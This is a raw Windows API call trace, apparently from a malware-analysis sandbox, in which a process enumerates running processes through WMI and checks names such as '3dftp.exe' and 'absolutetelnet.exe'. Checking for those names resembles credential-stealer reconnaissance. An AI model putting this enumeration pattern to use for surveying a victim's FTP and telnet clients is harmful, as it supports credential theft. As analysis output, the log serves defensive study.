WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.966] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.966] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.966] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.966] IWbemClassObject:Get (in: This=0x551f5a0, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d3d28*=0, plFlavor=0x23d3d2c*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="3dftp.exe", varVal2=0x0), pType=0x23d3d28*=8, plFlavor=0x23d3d2c*=0) returned 0x0 [0264.966] SysStringByteLen (bstr="3dftp.exe") returned 0x12 [0264.966] SysStringByteLen (bstr="3dftp.exe") returned 0x12 [0264.967] IWbemClassObject:Get (in: This=0x551f5a0, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d3d28*=8, plFlavor=0x23d3d2c*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="3dftp.exe", varVal2=0x0), pType=0x23d3d28*=8, plFlavor=0x23d3d2c*=0) returned 0x0 [0264.967] SysStringByteLen (bstr="3dftp.exe") returned 0x12 [0264.967] SysStringByteLen (bstr="3dftp.exe") returned 0x12 [0264.967] CoTaskMemAlloc (cb=0x4) returned 0x54ba2c8 [0264.978] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2c8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2c8*=0x551ec10, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.980] IUnknown:QueryInterface (in: This=0x551ec10, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x551ec10) returned 0x0 [0264.980] IUnknown:QueryInterface (in: This=0x551ec10, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.980] IUnknown:QueryInterface (in: This=0x551ec10, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.980] IUnknown:QueryInterface (in: This=0x551ec10, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.980] IUnknown:AddRef (This=0x551ec10) returned 0x3 [0264.980] IUnknown:QueryInterface (in: This=0x551ec10, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.980] IUnknown:QueryInterface (in: This=0x551ec10, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.980] IUnknown:QueryInterface (in: This=0x551ec10, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x551ec14) returned 0x0 [0264.980] IMarshal:GetUnmarshalClass (in: This=0x551ec14, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.981] IUnknown:Release (This=0x551ec14) returned 0x3 [0264.981] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.981] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.981] IUnknown:QueryInterface (in: This=0x551ec10, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.981] IUnknown:Release (This=0x551ec10) returned 0x2 [0264.981] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.981] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.981] IUnknown:QueryInterface (in: This=0x551ec10, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x551ec10) returned 0x0 [0264.981] IUnknown:AddRef (This=0x551ec10) returned 0x4 [0264.981] IUnknown:Release (This=0x551ec10) returned 0x3 [0264.981] IUnknown:Release (This=0x551ec10) returned 0x2 [0264.981] CoTaskMemFree (pv=0x54ba2c8) [0264.981] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.981] IUnknown:AddRef (This=0x551ec10) returned 0x3 [0264.981] IWbemClassObject:Get (in: This=0x551ec10, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.981] IWbemClassObject:Get (in: This=0x551ec10, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1532\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.982] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1532\"") returned 0x5e [0264.982] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1532\"") returned 0x5e [0264.982] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.982] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.982] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.982] IUnknown:Release (This=0x601a94) returned 0x1 [0264.985] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba398) returned 0x0 [0264.985] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba398, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.985] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba398, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5514b98) returned 0x0 [0264.985] WbemDefPath:IUnknown:Release (This=0x54ba398) returned 0x0 [0264.985] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514b98, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5514b98) returned 0x0 [0264.985] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514b98, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.985] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514b98, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.986] WbemDefPath:IUnknown:AddRef (This=0x5514b98) returned 0x3 [0264.986] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514b98, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.986] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514b98, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.986] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514b98, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x551d700) returned 0x0 [0264.986] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x551d700, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.986] WbemDefPath:IUnknown:Release (This=0x551d700) returned 0x3 [0264.986] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.986] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.986] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514b98, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.987] WbemDefPath:IUnknown:Release (This=0x5514b98) returned 0x2 [0264.987] WbemDefPath:IUnknown:Release (This=0x5514b98) returned 0x1 [0264.987] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.987] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.987] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514b98, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5514b98) returned 0x0 [0264.987] WbemDefPath:IUnknown:AddRef (This=0x5514b98) returned 0x3 [0264.987] WbemDefPath:IUnknown:Release (This=0x5514b98) returned 0x2 [0264.987] WbemDefPath:IWbemPath:SetText (This=0x5514b98, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1532\"") returned 0x0 [0264.987] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.987] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.987] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.987] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.987] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.987] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.988] IWbemClassObject:Get (in: This=0x551ec10, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d45ac*=0, plFlavor=0x23d45b0*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="absolutetelnet.exe", varVal2=0x0), pType=0x23d45ac*=8, plFlavor=0x23d45b0*=0) returned 0x0 [0264.988] SysStringByteLen (bstr="absolutetelnet.exe") returned 0x24 [0264.988] SysStringByteLen (bstr="absolutetelnet.exe") returned 0x24 [0264.988] IWbemClassObject:Get (in: This=0x551ec10, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d45ac*=8, plFlavor=0x23d45b0*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="absolutetelnet.exe", varVal2=0x0), pType=0x23d45ac*=8, plFlavor=0x23d45b0*=0) returned 0x0 [0264.988] SysStringByteLen (bstr="absolutetelnet.exe") returned 0x24 [0264.988] SysStringByteLen (bstr="absolutetelnet.exe") returned 0x24 [0264.988] CoTaskMemAlloc (cb=0x4) returned 0x54ba3b8 [0264.988] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba3b8, puReturned=0x23c1fd0 | out: apObjects=0x54ba3b8*=0x551fa68, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.989] IUnknown:QueryInterface (in: This=0x551fa68, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x551fa68) returned 0x0 [0264.990] IUnknown:QueryInterface (in: This=0x551fa68, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.990] IUnknown:QueryInterface (in: This=0x551fa68, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.990] IUnknown:QueryInterface (in: This=0x551fa68, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.990] IUnknown:AddRef (This=0x551fa68) returned 0x3 [0264.990] IUnknown:QueryInterface (in: This=0x551fa68, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.990] IUnknown:QueryInterface (in: This=0x551fa68, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.990] IUnknown:QueryInterface (in: This=0x551fa68, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x551fa6c) returned 0x0 [0264.990] IMarshal:GetUnmarshalClass (in: This=0x551fa6c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.990] IUnknown:Release (This=0x551fa6c) returned 0x3 [0264.990] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.990] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.990] IUnknown:QueryInterface (in: This=0x551fa68, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.991] IUnknown:Release (This=0x551fa68) returned 0x2 [0264.991] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.991] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.991] IUnknown:QueryInterface (in: This=0x551fa68, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x551fa68) returned 0x0 [0264.991] IUnknown:AddRef (This=0x551fa68) returned 0x4 [0264.991] IUnknown:Release (This=0x551fa68) returned 0x3 [0264.991] IUnknown:Release (This=0x551fa68) returned 0x2 [0264.991] CoTaskMemFree (pv=0x54ba3b8) [0264.991] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.991] IUnknown:AddRef (This=0x551fa68) returned 0x3 [0264.991] IWbemClassObject:Get (in: This=0x551fa68, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.991] IWbemClassObject:Get (in: This=0x551fa68, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1184\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.992] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1184\"") returned 0x5e [0264.992] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1184\"") returned 0x5e [0264.992] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.992] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.992] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.992] IUnknown:Release (This=0x601a94) returned 0x1 [0264.993] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba398) returned 0x0 [0264.993] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba398, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.994] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba398, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5515068) returned 0x0 [0264.995] WbemDefPath:IUnknown:Release (This=0x54ba398) returned 0x0 [0264.995] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515068, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5515068) returned 0x0 [0264.995] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515068, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.995] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515068, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.995] WbemDefPath:IUnknown:AddRef (This=0x5515068) returned 0x3 [0264.995] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515068, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.995] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515068, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.995] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515068, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5523620) 